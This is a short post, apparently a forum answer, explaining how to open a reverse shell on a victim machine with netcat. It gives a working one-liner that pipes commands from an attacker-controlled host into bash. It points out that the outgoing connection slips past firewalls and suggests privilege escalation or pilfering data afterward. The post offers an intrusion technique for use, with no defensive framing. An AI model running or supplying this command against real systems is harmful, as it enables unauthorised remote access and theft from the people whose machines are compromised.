You can crate a reverse shell with just netcat. On your victim machine, where you can run a command but not necessarily listen on a port you can run something like:

    nc attacker.ip 9000 | /bin/bash

This will reach out to the attacker controlled machine and run an arbitrary payload hosted there. A simple payload would be opening a reverse shell to the attacker controlled machine from the victim. Because it's an outgoing connection it's less likely to be blocked by a firewall.

The reverse shell gives you further access to the victim machine and can be entirely scripted. You can then use additional exploits for privilege elevation or just pilfer whatever you've got access to.

Note this a super simple demonstration of the concept.